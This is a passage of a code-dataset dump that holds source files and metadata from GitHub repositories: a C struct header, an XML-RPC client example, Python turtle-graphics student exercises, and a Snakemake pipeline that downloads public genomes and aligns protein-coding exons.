"text": "#include \"point.h\"\n\n/* nested structure */\ntypedef struct {\n Point start;\n Point end;\n} Line;\n\nLine get_line(void);\nvoid show_line(Line line);\nvoid move_line_by_ref(Line *line);\n"
},
{
"alpha_fraction": 0.679425835609436,
"alphanum_fraction": 0.6985645890235901,
"avg_line_length": 25.125,
"blob_id": "325979682d35827877fd2a7443adf14ae679f530",
"content_id": "067ecf04a2181d1a8d9e7da12364375316dbc338",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 209,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 8,
"path": "/xmlrpc/example1/client.py",
"repo_name": "binchen15/python-tricks",
"src_encoding": "UTF-8",
"text": "import xmlrpc.client\n\nproxy = xmlrpc.client.ServerProxy(\"http://localhost:5678\")\nprint(proxy.dir.list(\"/tmp\"))\ntry:\n proxy.listdir(\"/tmp\")\nexcept xmlrpc.client.Fault as err:\n print(\"Err {}\".format(err))\n"
}
] | 41 |
nohjune/ct_201710920 | https://github.com/nohjune/ct_201710920 | 641784ba736439b1591693534c26aa4577a1f5fb | 3c12dd41cb017a4a9c24e2af807c134d70e45c46 | 465cf738296082d681a11e2d9a15bf54d9af710e | refs/heads/master | 2021-01-19T09:37:45.449311 | 2017-05-29T08:06:13 | 2017-05-29T08:06:13 | 87,774,527 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.38768717646598816,
"alphanum_fraction": 0.6006655693054199,
"avg_line_length": 11.399999618530273,
"blob_id": "e1ce62da7cd280e402529a282cb74e321ed68597",
"content_id": "6d6af98d25620b3340e24e863c5d6d466687f0c1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 603,
"license_type": "no_license",
"max_line_length": 65,
"num_lines": 45,
"path": "/ct_2017/GanghoRoomClean.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn = turtle.Screen()\r\nt1 = turtle.Turtle()\r\nwn.bgpic(\"C:\\\\Users\\\\400T6B\\\\Downloads\\\\GanghoRoomFloorPlan.gif\")\r\nt1.fd(300)\r\nt1.home()\r\nt1.rt(90)\r\nt1.fd(250)\r\nt1.lt(90)\r\nt1.fd(300)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(400)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(75)\r\nt1.lt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(75)\r\nt1.rt(90)\r\nt1.penup()\r\nt1.fd(100)\r\nt1.pendown()\r\nt1.lt(90)\r\nt1.fd(400)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.rt(90)\r\nt1.fd(125)\r\nt1.lt(90)\r\nt1.fd(300)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.penup()\r\nt1.home()\r\nwn.exitonclick()"
},
{
"alpha_fraction": 0.4540778696537018,
"alphanum_fraction": 0.5584129095077515,
"avg_line_length": 18.938461303710938,
"blob_id": "7b75949a0cea7826a82e2133cf285a3d2f8ef2c6",
"content_id": "63355073c2ecb72794f4776e139e167cf003fbdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1363,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 65,
"path": "/ct_2017/201710920_10_5.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\nwidth=wn.window_width()\r\nx1=0.0 - (width-40)/3\r\nx2=0.0\r\nx3=0.0 + (width-40)/3\r\ndef drawTriangleAt(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\n t1.forward(100)\r\n t1.write(t1.pos())\r\n t1.left(120)\r\ndrawTriangleAt(100,x1)\r\ndef drawPentagon(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.left(72)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\ndrawPentagon(100,x2)\r\ndef drawStarAt(size,pos):\r\n t1.penup()\r\n t1.goto(pos,0)\r\n t1.setheading(0)\r\n t1.pendown()\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\n t1.forward(size)\r\n t1.rt(144)\r\n t1.write(t1.pos())\r\ndrawStarAt(100,x3)\r\n"
},
{
"alpha_fraction": 0.5430266857147217,
"alphanum_fraction": 0.6053412556648254,
"avg_line_length": 15.8421049118042,
"blob_id": "ba1951c2fded1945f8d0974d3f41d96d7dd6f0cd",
"content_id": "01f87e8f608712b51b530b236fe5982075c273fc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 339,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 19,
"path": "/ct_2017/baramgaebi2.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle \r\nwn=turtle.Screen() \r\nt1=turtle.Turtle()\r\nturnby=45\r\nsize=100\r\noldpos=t1.pos()\r\noldhead=t1.heading()\r\nnum=1\r\ndef wind(size):\r\n t1.fd(size)\r\n t1.rt(90)\r\n t1.fd(size)\r\n t1.penup()\r\n t1.setpos(oldpos)\r\n t1.setheading(oldhead+turnby*num)\r\n t1.pendown()\r\nfor num in range(1,9):\r\n wind(size)\r\n num+=1"
},
{
"alpha_fraction": 0.45517241954803467,
"alphanum_fraction": 0.5431034564971924,
"avg_line_length": 17.399999618530273,
"blob_id": "80d8278abcde8eb2156d07640169a89d57c9fa8b",
"content_id": "adc4c5da7ebff112c5bc69ad03773eb65ec4cdfe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 582,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 30,
"path": "/ct_2017/drawSquare_Triangle_Star.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ndef drawSquareAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,4):\r\n t1.fd(size)\r\n t1.rt(90)\r\n\r\ndef drawTriangleAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,3):\r\n t1.fd(size)\r\n t1.lt(120)\r\n\r\ndef drawStarAt(x,y,size):\r\n t1.penup()\r\n t1.goto(x,y)\r\n t1.pendown()\r\n for a in range(0,5):\r\n t1.fd(size)\r\n t1.rt(144)\r\n\r\ndrawSquareAt(-470,0,100)\r\ndrawTriangleAt(-100,0,100)\r\ndrawStarAt(370,0,100)"
},
{
"alpha_fraction": 0.6400911211967468,
"alphanum_fraction": 0.698177695274353,
"avg_line_length": 15.215685844421387,
"blob_id": "e9c4ecfa821fb2381cb5d2788bdc29b31ca0d8d6",
"content_id": "eac03ceaf9ff1a6e46ade1fdae164a4b39d0f00c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 878,
"license_type": "no_license",
"max_line_length": 31,
"num_lines": 51,
"path": "/ct_2017/baramgebi.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nt1=turtle.Turtle()\r\ndef giyuk(size):\r\n t1.fd(size)\r\n t1.rt(90)\r\n t1.fd(size)\r\nt1.home()\r\nt1.clear()\r\nturnby=45\r\nsize=100\r\noldpos=t1.pos()\r\noldhead=t1.heading()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*2)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*3)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*4)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*5)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*6)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\nt1.setheading(oldhead+turnby*7)\r\nt1.pendown()\r\ngiyuk(size)\r\nt1.penup()\r\nt1.setpos(oldpos)\r\n"
},
{
"alpha_fraction": 0.3228120505809784,
"alphanum_fraction": 0.559540867805481,
"avg_line_length": 9.73109245300293,
"blob_id": "c3805cae477100df3a117184ae89fbdd432e9321",
"content_id": "a797da3bb1f7e853a905454331521cfccca4da08",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1396,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 119,
"path": "/ct_2017/maze201710920.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nwn=turtle.Screen()\r\nwn.bgpic(\"C:\\\\Users\\\\400T6B\\\\Downloads\\\\20 by 20 orthogonal maze.gif\")\r\nt1=turtle.Turtle()\r\nt1.speed(1)\r\nt1.goto(-5,155)\r\nt1.fd(10)\r\nt1.fd(10)\r\nt1.rt(90)\r\nt1.clear()\r\nt1.goto(-5,155)\r\nt1.clear()\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(2)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.fd(3)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(3)\r\nt1.lt(90)\r\nt1.fd(20)\r\nt1.fd(5)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(20)\r\nt1.fd(20)\r\nt1.rt(90)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.lt(90)\r\nt1.fd(20)\r\nt1.fd(20)\r\nt1.lt(90)\r\nt1.fd(25)\r\nt1.fd(5)\r\nt1.fd(2)\r\nt1.fd(2)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.fd(5)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.rt(90)\r\nt1.fd(10)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(7)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(60)\r\nt1.rt(90)\r\nt1.fd(45)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(30)\r\nt1.fd(10)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(30)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.fd(5)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.lt(90)\r\nt1.fd(15)\r\nt1.rt(90)\r\nt1.fd(30)\r\nwn.exitonclick()"
},
{
"alpha_fraction": 0.37555229663848877,
"alphanum_fraction": 0.6185566782951355,
"avg_line_length": 11.897958755493164,
"blob_id": "3bd47cccd740be75b56c9665742e1500af678235",
"content_id": "45273b4ac215454fb0c6510b0b5a9755051ebec1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 681,
"license_type": "no_license",
"max_line_length": 18,
"num_lines": 49,
"path": "/ct_2017/wk6_201710920_name.py",
"repo_name": "nohjune/ct_201710920",
"src_encoding": "UTF-8",
"text": "import turtle\r\nt1=turtle.Turtle()\r\nwn=turtle.Screen()\r\nt1.shape(\"turtle\")\r\nt1.penup()\r\nt1.goto(-300,300)\r\nt1.rt(90)\r\nt1.pendown()\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(200)\r\nt1.goto(-200,200)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.rt(90)\r\nt1.fd(100)\r\nt1.pos()\r\nt1.goto(-100,100)\r\nt1.penup()\r\nt1.goto(100,300)\r\nt1.pendown()\r\nt1.rt(90)\r\nt1.rt(90)\r\nt1.fd(200)\r\nt1.pos()\r\nt1.goto(200,300)\r\nt1.goto(100,200)\r\nt1.goto(200,300)\r\nt1.goto(300,200)\r\nt1.penup()\r\nt1.goto(50,150)\r\nt1.pendown()\r\nt1.fd(250)\r\nt1.fd(50)\r\nt1.pos()\r\nt1.goto(175,150)\r\nt1.goto(200,150)\r\nt1.rt(90)\r\nt1.fd(50)\r\nt1.penup()\r\nt1.pos()\r\nt1.goto(100,50)\r\nt1.goto(100,100)\r\nt1.pendown()\r\nt1.fd(100)\r\nt1.lt(90)\r\nt1.fd(200)\r\n\r\nwn.exitonclick()"
}
] | 7 |
lun3322/smzdm_bot | https://github.com/lun3322/smzdm_bot | 6d7245d83c54c175461c87cb41ce8568391768b6 | b45bfc4252aacae1b59269d283839876d965f4b3 | 42982e65f368fbae9858d82ea2391c0673212daf | refs/heads/main | 2023-05-31T07:23:58.803952 | 2021-07-05T03:21:06 | 2021-07-05T03:21:06 | 340,245,795 | 0 | 0 | null | 2021-02-19T03:16:55 | 2021-02-18T12:13:28 | 2021-02-15T09:02:03 | null | [
{
"alpha_fraction": 0.4740346074104309,
"alphanum_fraction": 0.47536617517471313,
"avg_line_length": 21.40625,
"blob_id": "185f62403eb3049f7efba7420bec881da88d2be2",
"content_id": "12a36daeb384dc21e0cb4aaebe0fd2baa69ecc20",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 771,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 32,
"path": "/utils/serverchan_push.py",
"repo_name": "lun3322/smzdm_bot",
"src_encoding": "UTF-8",
"text": "\r\nimport config\r\nimport requests\r\n\r\n\r\ndef push_to_wechat(text, desp, appToken, uid):\r\n \"\"\"\r\n 通过wxpusher将消息推送到微信\r\n \"\"\"\r\n url = f'http://wxpusher.zjiecode.com/api/send/message'\r\n session = requests.Session()\r\n data = {\r\n \"appToken\": appToken,\r\n \"content\": desp,\r\n \"summary\": text,\r\n \"contentType\": 1,\r\n \"topicIds\": [],\r\n \"uids\": [\r\n uid\r\n ],\r\n }\r\n headers = {\r\n 'Content-Type': 'application/json'\r\n }\r\n resp = session.post(url, json=data, headers=headers)\r\n return resp.json()\r\n\r\n\r\nif __name__ == '__main__':\r\n resp = push_to_wechat(text='test', desp='hi',\r\n appToken='',\r\n uid='')\r\n print(resp)\r\n"
}
] | 1 |
MartinGildea/tutorial2_primeFactor_competition | https://github.com/MartinGildea/tutorial2_primeFactor_competition | f629231f8398077b1b58904be60b385dea82242b | 3c2bb27d7964d88a78ccdf5eace2707007322fa0 | b623bef8519a63613abede526c1dbb43c2856494 | refs/heads/master | 2021-07-13T02:31:23.793338 | 2017-10-08T15:56:13 | 2017-10-08T15:56:13 | 105,880,631 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6248725652694702,
"alphanum_fraction": 0.6472986936569214,
"avg_line_length": 39.875,
"blob_id": "82d35b1f595648d45986f0d94fe041baf8538e5b",
"content_id": "04e0560b3645241f1516fdadaf3761c37fd6cce4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 981,
"license_type": "no_license",
"max_line_length": 136,
"num_lines": 24,
"path": "/martingildea_tutorial2_competition.py",
"repo_name": "MartinGildea/tutorial2_primeFactor_competition",
"src_encoding": "UTF-8",
"text": "# primeFactors.py\n# import test code\nfrom lab2Test import speedTestFun\n# --------------------------------\n# primeFactors()\n# input: A positive integer n (e.g. 19162234)\n# output: A list of the prime factors of n with multiplicity (e.g. [2, 7, 7, 13, 13, 13, 89])\n# method: Divide n by all possible integers in increasing numerical order, which will naturally eliminate\n# non-prime numbers.\n# --------------------------------\ndef primeFactors(n):\n primeList = [] #primeList is the list of all primeFactors of the target number\n primeDivisor = 2 #primeDivisor is a variable that will be added to the list if it can divide the target number without a remainder.\n while primeDivisor * primeDivisor <= n:\n if n % primeDivisor:\n primeDivisor = primeDivisor + 1\n else:\n n = n / primeDivisor\n primeList.append(primeDivisor)\n primeList.append(n)\n return primeList\n\n#testFun(primeFactors)\nspeedTestFun(primeFactors)\n"
}
] | 1 |
WatsonLab/sm_assemblies | https://github.com/WatsonLab/sm_assemblies | 0134a7d56f0dd708e13a7294b6c3294034a21ea5 | 1e8fe0518c4f89b4648b6e1d56dff78b6249bc1c | 35259beef8459ca2af3a8f5047af59f8c41efb01 | refs/heads/master | 2021-05-02T09:51:35.570992 | 2020-03-03T21:34:24 | 2020-03-03T21:34:24 | 120,784,949 | 8 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6990172266960144,
"alphanum_fraction": 0.7567567825317383,
"avg_line_length": 24.40625,
"blob_id": "e992cc7851b53c20e9baed322e5cac48199e6bf9",
"content_id": "c94efe9fc6360e169336a6c566bf9ab58ac6e010",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1628,
"license_type": "no_license",
"max_line_length": 230,
"num_lines": 64,
"path": "/README.md",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "# sm_assemblies\nAnalysis of protein coding exons in single molecule assemblies\n\n# dependencies\n* Snakemake\n* BioPython\n* conda\n* splign (https://www.ncbi.nlm.nih.gov/sutils/splign/splign.cgi?textpage=downloads)\n* Python 3.5\n* BLAT\n* wget\n* samtools\n\n# clone this repo\n```\ngit clone https://github.com/WatsonLab/sm_assemblies.git\ncd sm_assemblies\n```\n\n# download genomes\n```\n/bin/bash scripts/download.sh\ngunzip *.fasta.gz\nmkdir genomes\nmv *.fasta genomes\n```\n\n# run\n```\nsnakemake --use-conda\n```\n\n## parse splign output\n\nPerl script alnparse.pl can be used to summarise the splign output. \n\nThe way the pipeline stores splign results is in a \"one query, one subject\" file i.e. \"ENST00000052569.10.OCVW01001666.1.aln\" - this would be all of the splign hits from ENST00000052569.10 (query) against OCVW01001666.1 (subject).\n\nTo summarise the best hit from a single alignment file, run the script like this:\n\n```sh\nperl scripts/alnparse.pl ENST00000052569.10.OCVW01001666.1.aln\n```\n\nHowever, often we want to consider the hits against multiple subjects in order to find the best hit. In this case, we run it like this:\n\n```sh\nperl scripts/alnparse.pl <(cat ENST00000052569.10.*.aln)\n```\n\nThis will find the best hit from alignments of ENST00000052569.10 against all subjects it has been aligned against.\n\nThe output is tab-delimited:\n* query name\n* hit name\n* query start\n* length of alignment\n* number of mismatch events\n* number of bases in mismatch events\n* number of insertion events\n* number of bases in insertion events\n* number of deletion events\n* number of bases in deletion events\n* protein sequence of aligned bases\n\n\n"
},
{
"alpha_fraction": 0.6173613667488098,
"alphanum_fraction": 0.6264669895172119,
"avg_line_length": 33.55244827270508,
"blob_id": "1d5582cd94f1796313ab1949df15cb5baef51083",
"content_id": "e29f09a06288f58f0e9be59432c2d9859e39e6ea",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4942,
"license_type": "no_license",
"max_line_length": 668,
"num_lines": 143,
"path": "/Snakefile",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "shell.executable(\"/bin/bash\")\nshell.prefix(\"source $HOME/.bashrc; \")\n\nfrom Bio import SeqIO\nimport sys\nimport os\n\nIDS, = glob_wildcards(\"genomes/{id}.fasta\")\n\nrule all:\n\tinput: expand(\"{sample}.splign.finished.txt\", sample=IDS), expand(\"genomes/{sample}.fasta.fai\", sample=IDS), expand(\"{sample}.transcript_ids.txt\", sample=IDS), expand(\"blat_{sample}.tsv\", sample=IDS), expand(\"blat_{sample}.blast\", sample=IDS), \"unique_transcript_ids.txt\"\n\nrule coding_transcripts_download:\n\toutput: \"protein_coding_transcripts.fasta\"\n\tshell:\n\t\t'''\n\t\twget -O protein_coding_transcripts.fasta.gz ftp://ftp.ensembl.org/pub/release-92/fasta/homo_sapiens/cds/Homo_sapiens.GRCh38.cds.all.fa.gz\n\t\tgunzip protein_coding_transcripts.fasta.gz\n\t\tsamtools faidx protein_coding_transcripts.fasta\n\t\t'''\n\nrule exons_download:\n output: \"protein_coding_exons.fasta\"\n shell: \"wget -O protein_coding_exons.fasta 'http://www.ensembl.org/biomart/martservice?query=<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><!DOCTYPE Query><Query virtualSchemaName = \\\"default\\\" formatter = \\\"FASTA\\\" header = \\\"0\\\" uniqueRows = \\\"1\\\" count = \\\"\\\" datasetConfigVersion = \\\"0.6\\\" ><Dataset name = \\\"hsapiens_gene_ensembl\\\" interface = \\\"default\\\" ><Filter name = \\\"biotype\\\" value = \\\"protein_coding\\\"/><Filter name = \\\"transcript_biotype\\\" value = \\\"protein_coding\\\"/><Attribute name = \\\"ensembl_gene_id\\\" /><Attribute name = \\\"ensembl_transcript_id\\\" /><Attribute name = \\\"gene_exon\\\" /><Attribute name = \\\"ensembl_exon_id\\\" /></Dataset></Query>'\"\n\nrule length_filter:\n input: \"protein_coding_exons.fasta\"\n output: \"protein_coding_exons.filtered.fasta\"\n params:\n len=300\n run:\n input_seq_iterator = SeqIO.parse(open(input[0], \"rU\"), \"fasta\")\n short_seq_iterator = (record for record in input_seq_iterator \\\n if len(record.seq) > int(300))\n\n output_handle = open(output[0], \"w\")\n SeqIO.write(short_seq_iterator, output_handle, \"fasta\")\n output_handle.close()\n\n\nrule make_faidx:\n\tinput: \"genomes/{id}.fasta\"\n\toutput: \"genomes/{id}.fasta.fai\"\n\tshell: \"samtools faidx {input}\"\n\nrule splign:\n\tinput:\n\t\tidl=\"trouble_list.txt\",\n\t\tblo=\"blat_{id}.blast\",\n\t\tass=\"genomes/{id}.fasta\",\n\t\tfai=\"genomes/{id}.fasta.fai\"\n\toutput: \"{id}.splign.finished.txt\"\n\tparams: dir=\"{id}.splign\"\n\tconda: \"envs/bioperl.yml\"\n\tshell:\n\t\t\"\"\"\n\t\tperl scripts/run_splign.pl {input.idl} {input.blo} {input.ass} {params.dir} && touch {output}\n\t\t\"\"\"\n\nrule make_ooc:\n\tinput: \"genomes/{id}.fasta\"\n\toutput: \"{id}.ooc\"\n\tshell: \"blat {input} /dev/null /dev/null -makeOoc={output} -repMatch=1024\"\n\nrule blat:\n\tinput:\n\t\tgen=\"genomes/{id}.fasta\",\n\t\tooc=\"{id}.ooc\",\n\t\texn=\"protein_coding_exons.filtered.fasta\"\n\toutput: \"blat_{id}.psl\"\n\tshell: \"blat {input.gen} {input.exn} -out=blast9 -ooc={input.ooc} {output}\"\n\nrule blat_cdna:\n\tinput:\n\t\tgen=\"genomes/{id}.fasta\",\n\t\tooc=\"{id}.ooc\",\n\t\tcdn=\"protein_coding_transcripts.fasta\"\n\toutput: \"blat_{id}.blast\"\n\tshell: \"blat {input.gen} {input.cdn} -out=blast -ooc={input.ooc} {output}\"\n\nrule unique_tid:\n\tinput: \"protein_coding_exons.filtered.fasta\"\n\toutput: \"unique_transcript_ids.txt\"\n\tshell: \"cat {input} | grep '>' | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {output}\"\n\nrule get_list:\n\tinput: \n\t\tuti=\"unique_transcript_ids.txt\",\n\t\trep=\"blat_{id}.tsv\"\n\toutput: \"{id}.transcript_ids.txt\"\n\tparams:\n\t\ttmp=\"{id}\"\n\tshell:\n\t\t\"\"\"\n\t\tcat {input.rep} | awk '$6>0' | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {params.tmp}.faulty\n\t\tcat {input.rep} | awk -F'|' '{{print $2}}' | perl -e 'while(<>) {{print join(\\\"\\\\n\\\", split(\\\";\\\"))}}' | sort | uniq > {params.tmp}.allhits\n\t\tcomm {params.tmp}.allhits {input.uti} | awk -F\\\"\\\\t\\\" '$2~/ENST/ {{print $2}}' > {params.tmp}.missing\n\t\tcat {params.tmp}.faulty {params.tmp}.missing > {output}\n\t\t\"\"\"\n\nrule combine_lists:\n\tinput: expand(\"{allids}.transcript_ids.txt\", allids=IDS)\n\toutput: \"trouble_list.txt\"\n\tshell: \"cat {input} | sort | uniq > {output}\"\n\nrule report:\n\tinput: \"blat_{id}.psl\", \"protein_coding_exons.filtered.fasta\"\n\toutput: \"blat_{id}.tsv\"\n\trun:\n\t\tseq_length = dict()\n\n \t\twith open(input[1], \"rU\") as handle:\n\t\t\tfor record in SeqIO.parse(handle, \"fasta\"):\n\t\t\t\tseq_length[record.id] = len(record.seq)\n\n\t\t# open the input file\n\t\tpsl_file = open(input[0], mode=\"r\")\n\n\t\ttop_hits = dict()\n\n\t\t# open the output file\n\t\tf = open(output[0], 'w')\n\n\t\t# iterate over file\n\t\tfor row in psl_file:\n\n\t\t\tif row.startswith(\"#\"):\n\t\t\t\tcontinue\n \n\t\t\t# split on whitespace\n\t\t\tarr = row.strip().split()\n\n\t\t\tif arr[0] in top_hits:\n\t\t\t\tcontinue\n\n\t\t\ttop_hits[arr[0]] = 1\n\t\t\t\n\t\t\tif arr[0] in seq_length.keys():\n\t\t\t\tprint(\"%s\\t%s\\t%s\\t%s\\t%s\\t%s\" % (arr[0], seq_length[arr[0]], arr[2], arr[3], arr[4], arr[5]), file=f)\n\t\t\telse:\n\t\t\t\tprint(\"This key isn't in seq_length: \", arr[0], end='\\n\\n')\n\n\t\tf.close()\n\n"
},
{
"alpha_fraction": 0.6181262731552124,
"alphanum_fraction": 0.7841140627861023,
"avg_line_length": 56.588233947753906,
"blob_id": "868179208f5f3bb6c3b05c57e11d695fe99ef750",
"content_id": "b9696cbc6dfea6a2e1f53b8e1243e861ae63410c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 982,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 17,
"path": "/scripts/download.sh",
"repo_name": "WatsonLab/sm_assemblies",
"src_encoding": "UTF-8",
"text": "# GRCh38\nwget -O grch38.fasta.gz ftp://ftp.ensembl.org/pub/release-91/fasta/homo_sapiens/dna/Homo_sapiens.GRCh38.dna.primary_assembly.fa.gz\n\n# PacBio 15X\nwget -O pacbio.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/001/013/985/GCA_001013985.1_ASM101398v1/GCA_001013985.1_ASM101398v1_genomic.fna.gz\n\n# nanopore\nwget -O nanopore.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/900/232/925/GCA_900232925.1_Nanopore-only_assembly_with_Illumina_polishing/GCA_900232925.1_Nanopore-only_assembly_with_Illumina_polishing_genomic.fna.gz\n\n# Pacbio CHM1\nwget http://gembox.cbcb.umd.edu/shared/canu/quiver/canu/chm1.round2.fasta\n\n# Illumina CHM1\nwget -O illumina_chm1.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/306/695/GCA_000306695.2_CHM1_1.1/GCA_000306695.2_CHM1_1.1_genomic.fna.gz\n\n# Illumina NA12878\nwget -O illumina_na12878.fasta.gz ftp://ftp.ncbi.nlm.nih.gov/genomes/all/GCA/000/185/165/GCA_000185165.1_HsapALLPATHS1/GCA_000185165.1_HsapALLPATHS1_genomic.fna.gz\n\n\n\n"
}
] | 3 |
